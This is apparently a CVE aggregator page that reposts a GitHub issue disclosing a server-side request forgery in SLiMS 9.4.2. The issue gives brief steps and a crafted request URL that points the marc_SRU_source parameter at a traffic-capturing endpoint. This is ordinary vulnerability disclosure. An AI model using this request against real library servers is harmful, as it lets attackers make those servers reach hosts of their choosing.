Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-38292: [Security Bugs] Server Side Request Forgery · Issue #158 · slims/slims9_bulian

SLiMS Senayan Library Management System v9.4.2 was discovered to contain multiple Server-Side Request Forgeries via the components /bibliography/marcsru.php and /bibliography/z3950sru.php.

CVE
Open in Source
#mac#google#php#ssrf#chrome

The bug
A Server Side Request Forgery exists in admin/modules/bibliography/marcsru.php and admin/modules/bibliography/z3950sru.php due to the class in lib/marc/XMLParser.inc.php

Reproduce
Steps to reproduce the behavior:

  1. Go to http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/index.php?mod=bibliography then go to copy cataloguing
  2. choose between marc sru or 23950sru
  3. type in something what you want in the search bar
  4. set burpsuite intercept on
  5. change the z3950_SRU_source or marc_SRU_source parameter value to some url that grab the traffic
  6. forward the request
  7. or just visit http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/modules/bibliography/marcsru.php?keywords=aaaaaaaa&index=0&marc_SRU_source=URL_ENCODED_ENDPOINT_THAT_CAPTURE_HTTP_LIKE_HOOKBIN

Screenshots
Normal requests

Tampered and SSRF trigger(netcat)

Tampered and SSRF trigger(toptal.com)

Versions

  • OS: MacOS Mojave 10.14.6
  • Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86_64)
  • Slims Version: slims9_bulian-9.4.2

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE